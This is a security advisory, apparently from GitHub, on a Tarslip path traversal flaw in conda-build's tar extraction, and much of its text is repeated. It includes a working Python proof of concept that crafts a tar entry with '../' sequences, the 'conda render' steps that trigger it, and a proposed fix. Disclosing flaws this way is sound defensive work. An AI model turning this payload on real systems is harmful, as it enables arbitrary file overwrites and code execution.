The conda-build processing logic is vulnerable to path traversal (Tarslip) attacks due to improper sanitization of tar entry paths. Attackers can craft tar archives containing entries with directory traversal sequences (e.g., ../../../../../var/run/shm/poc.txt) to write files outside the intended extraction directory. This could lead to arbitrary file overwrites, privilege escalation, or code execution if sensitive locations (e.g., ~/.bashrc) are targeted.
The severity is reduced because exploitation requires user interaction (processing a malicious tar file) and the ability to predict or target sensitive filesystem locations, conditions common in shared environments such as multi-user systems or CI/CD pipelines. While crafting a tar file with traversal sequences (e.g., ../../malicious.sh) is trivial, successful exploitation hinges on overwriting files in predictable or privileged paths (e.g., user configuration directories). If achieved, this could lead to arbitrary code execution by modifying executables, shell profiles (e.g., .bashrc), or cron jobs. The risk mirrors historical Tarslip flaws like CVE-2007-4559, where unvalidated tar extraction enabled systemic compromise despite requiring user action.
The following PoC demonstrates the method by which malicious tar file can be extracted to an arbitrary location via the conda render command:
import io
import os
import tarfile
malicious_content = b"This is a malicious file!\n"
with tarfile.open("poc.tar", "w") as f:
tarinfo = tarfile.TarInfo(name="../../../../../var/run/shm/poc.txt")
tarinfo.size = len(malicious_content)
f.addfile(tarinfo, fileobj=io.BytesIO(malicious_content))
Steps:
- Generate a malicious tar file using the provided Python script.
- Run conda render poc.tar
- Observe that /var/run/shm/poc.txt is created with attacker-controlled content.
Output:
$ python3 poc.tar
$ conda render poc.tar
WARNING: Number of parsed outputs does not match detected raw metadata blocks. Identified output block may be wrong! If you are using Jinja conditionals to include or exclude outputs, consider using `skip: true # [condition]` instead.
[...]
$ cat /var/run/shm/poc.txt
This is a malicious file!
Affected Files:
https://github.com/conda/conda-build/[...]/conda_build/convert.py
https://github.com/conda/conda-build/[...]/conda_build/render.py
|
elif recipe.suffixes in [[".tar"], [".tar", ".gz"], [".tgz"], [".tar", ".bz2"]]: |
|
# extract the recipe to a temporary directory |
|
with TemporaryDirectory() as tmp, tarfile.open(recipe, "r:*") as tar: |
|
tar.extractall(path=tmp) |
|
yield Path(tmp) |
The vulnerability stems from insecure tar extraction logic in conda-build which uses tar.extractall() without sanitizing tar entry paths. This allows attackers to craft tar files with directory traversal sequences (e.g., ../../../../../var/run/shm/poc.txt). When processed by conda-build, these entries escape the intended extraction directory and write files to arbitrary locations.
Proposed Fix:
The remediation involves modernizing the tar extraction logic across conda-build by leveraging Python’s built-in safeguards wherever possible. For Python versions ≥3.12, using tar.extractall(path=target_dir, filter='data') is recommended, as this approach inherently blocks directory traversal attempts through its filtering mechanism.
For earlier Python versions, it is advisable to implement a dedicated sanitization function (e.g., safe_extract) that normalizes each tar entry’s path and verifies that the resolved absolute path remains within the intended target directory using os.path.abspath. This consistent methodology replaces ad-hoc or incomplete checks and should be uniformly applied across conda-build and any other modules handling tar extraction, thereby ensuring robust defense against malicious path manipulations.
stamparm Finder
jaimergp Remediation developer
kenodegard Remediation reviewer
beckermr Remediation reviewer
The conda-build processing logic is vulnerable to path traversal (Tarslip) attacks due to improper sanitization of tar entry paths. Attackers can craft tar archives containing entries with directory traversal sequences (e.g., ../../../../../var/run/shm/poc.txt) to write files outside the intended extraction directory. This could lead to arbitrary file overwrites, privilege escalation, or code execution if sensitive locations (e.g., ~/.bashrc) are targeted.
The severity is reduced because exploitation requires user interaction (processing a malicious tar file) and the ability to predict or target sensitive filesystem locations, conditions common in shared environments such as multi-user systems or CI/CD pipelines. While crafting a tar file with traversal sequences (e.g., ../../malicious.sh) is trivial, successful exploitation hinges on overwriting files in predictable or privileged paths (e.g., user configuration directories). If achieved, this could lead to arbitrary code execution by modifying executables, shell profiles (e.g., .bashrc), or cron jobs. The risk mirrors historical Tarslip flaws like CVE-2007-4559, where unvalidated tar extraction enabled systemic compromise despite requiring user action.
The following PoC demonstrates the method by which malicious tar file can be extracted to an arbitrary location via the conda render command:
Steps:
Output:
Affected Files:
https://github.com/conda/conda-build/[...]/conda_build/convert.py
https://github.com/conda/conda-build/[...]/conda_build/render.py
conda-build/conda_build/render.py
Lines 989 to 993 in 834448b
The vulnerability stems from insecure tar extraction logic in conda-build which uses tar.extractall() without sanitizing tar entry paths. This allows attackers to craft tar files with directory traversal sequences (e.g., ../../../../../var/run/shm/poc.txt). When processed by conda-build, these entries escape the intended extraction directory and write files to arbitrary locations.
Proposed Fix:
The remediation involves modernizing the tar extraction logic across conda-build by leveraging Python’s built-in safeguards wherever possible. For Python versions ≥3.12, using tar.extractall(path=target_dir, filter='data') is recommended, as this approach inherently blocks directory traversal attempts through its filtering mechanism.
For earlier Python versions, it is advisable to implement a dedicated sanitization function (e.g., safe_extract) that normalizes each tar entry’s path and verifies that the resolved absolute path remains within the intended target directory using os.path.abspath. This consistent methodology replaces ad-hoc or incomplete checks and should be uniformly applied across conda-build and any other modules handling tar extraction, thereby ensuring robust defense against malicious path manipulations.